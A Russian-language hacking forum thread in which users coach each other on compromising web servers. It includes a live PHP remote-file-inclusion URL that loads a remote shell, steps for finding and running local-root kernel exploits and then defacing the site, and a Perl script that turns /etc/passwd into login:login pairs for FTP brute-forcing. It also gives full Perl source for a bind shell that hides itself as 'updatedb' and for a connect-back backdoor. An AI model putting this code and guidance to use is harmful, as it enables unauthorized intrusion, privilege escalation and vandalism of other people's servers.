ну закачаешь ты файл 2ndmenu без расширения, и что дальше? тем более, там в начале "c/". линк в студию
chmod 777 /home/site/index.php он всё равно выполнится как php код = ) Другое дело что там с/ в начале
http://212.41.0.34/index.php?fl=http://newxs.narod.ru/shell.txt&part=main Линк взят из раздела "PHP Иньекции"
выполняешь uname -a Смотришь чё тебе выдало, например Linux 2.6.14 идёшь на милворм или в гугл пишешь Linux 2.6.14 local root exploit если есть плоенты для этой версии, качаешь его на сервер в папку /tmp и следуешь инструкциям написанным в плоенте =\ Получаешь рута, теперь ты хэкер и король. Делаешь дефейс я пляшешь вокруг него с бубном =\
Понял ! Тренируюсь дальше FreeBSD ns.sibstu.kts.ru 6.2-PRERELEASE FreeBSD 6.2-PRERELEASE #1: Tue Oct 31 18:11:44 KRAT 2006 [email protected].
del Вот смотрите , кто - то залил шелл свой на сервер , а у меня не получаетсья , как он зделал , если кто знает , расскажите . И его шелл может все редактировать , создавать , удалять , короче гворя , полный доступ. Спасибо
Можно пропарсить и побрутить FTP на login:login вдруг повезёт. Вот парсер: Code: #!/usr/bin/perl $in=$ARGV[0]; $out=$ARGV[1]; ## определим параметры скрипта exit print "Use $0 $in $out\n" unless ($out); open(IN, "$in"); open(OUT, ">out"); while(<IN>){ chomp; if (~/sh$/){ ## запишем только валидные аккаунты ($u,@udef)=split ":"; print OUT "$u:$u\n"; ## В виде пары login:login } } close(IN); close(OUT);
У меня вот тут возник вопрос... Есть у меня шелл... залил под фрюху туда эксплойт... А как его запутить то? Сорри за ламерский вопрос=))
Надо пробиндить машину, законектиться с помощью netcat и скомпилить сплойт. bind.pl: Code: #!/usr/bin/perl $port = 32767; $port = $ARGV[0] if $ARGV[0]; exit if fork; $0 = "updatedb" . " " x100; $SIG{CHLD} = 'IGNORE'; use Socket; socket(S, PF_INET, SOCK_STREAM, 0); setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); bind(S, sockaddr_in($port, INADDR_ANY)); listen(S, 50); while(1) { accept(X, S); unless(fork) { open STDIN, "<&X"; open STDOUT, ">&X"; open STDERR, ">&X"; close X; exec("/bin/sh"); } close X; } С помощью шелла выполняем команду : perl bind.pl в дире /tmp конектимся через netcat : 111.111.111.111 3432
Хммм почему то не биндиться машина... или забиндилась. Можно какнить проверить? а то он уже пол часа грузится... Во ещё там нашёл такой файлик=) bd.pl Code: #!/usr/bin/perl use IO::Socket; #cONNECT BACKDOOR EDITED BY XORON #lord@SlackwareLinux:/home/programing$ perl dc.pl #--== WElcome Obormot ==-- # #Usage: dc.pl [Host] [Port] # #Ex: dc.pl 127.0.0.1 2121 #lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 #--== ConnectBack Backdoor Shell is redy ==-- # #[*] Resolving HostName #[*] Connecting... 127.0.0.1 #[*] Spawning Shell #[*] Connected to remote host #bash-2.05b# nc -vv -l -p 2121 #listening on [any] 2121 ... #connect to [127.0.0.1] from localhost [127.0.0.1] 32769 #--== ConnectBack Backdoor Shell EDITED BY XORON TURKЭSH HACKER ==-- # #--==Systeminfo==-- #Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux # #--==Userinfo==-- #uid=1001(xoron) gid=100(users) groups=100(users) # #--==Directory==-- #/root # #--==Shell==-- # $system = '/bin/sh'; $ARGC=@ARGV; print "--== ConnectBack Backdoor Shell EDITED BY XORON TURKЭSH HACKER ==-- \n\n"; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; print "[*] Resolving HostName\n"; print "[*] Connecting... $ARGV[0] \n"; print "[*] Spawning Shell \n"; print "[*] Connected to remote host \n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); print "--== ConnectBack Backdoor Shell EDITED BY XORON TURKЭSH HACKER ==-- \n\n"; system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo; echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "); system($system); #EOF
2XENON4IK Можно проверить командой ps в веб шелле, если конечно она доступна. Мне кажеться сдесь был хекер, файл bd.pl это бекдор. 2Xszz perl parser.pl ftppass.txt out ftppass.txt - есть тот файл с etc/passwd out - отпарсированый файл с login:login -- также есть траблы с актив перлом под винду , почему то иногда не пашет. Без проблем можно отпарсировать в любой *nix или в Cygwin.
Не я понял что там был кул хацкер из турции=))) Проблему решил. подконнектился через неткэт. Пытался откомпилить сплоит.. но чёто не так или просто сплойт не пашет.. компилил так: Code: gcc -o3 -static -(чёто)-(чёто)-pointer kernel.c -o kernel Причём между -(чёто)-(чёто)-pointer нету пробелов... Это видел в каком то видео... сорри что не помню что там было точно написано. Но не суть. Вроде он компилится и создаёт этот файл kernel. Я его запускаю он мне типо пишет создал папку /tmp/sh а реально он её не создаёт... Это в чём проблема в компиляции или просто ядро пропатчено? Ядро вроде уязвимое по версии... Домой прийду отпишусь поподробнее...
Если ядро патченое, сдесь кроме приват сплоинтов не чё не поможет =\, смотрим версии уязвимых демонов.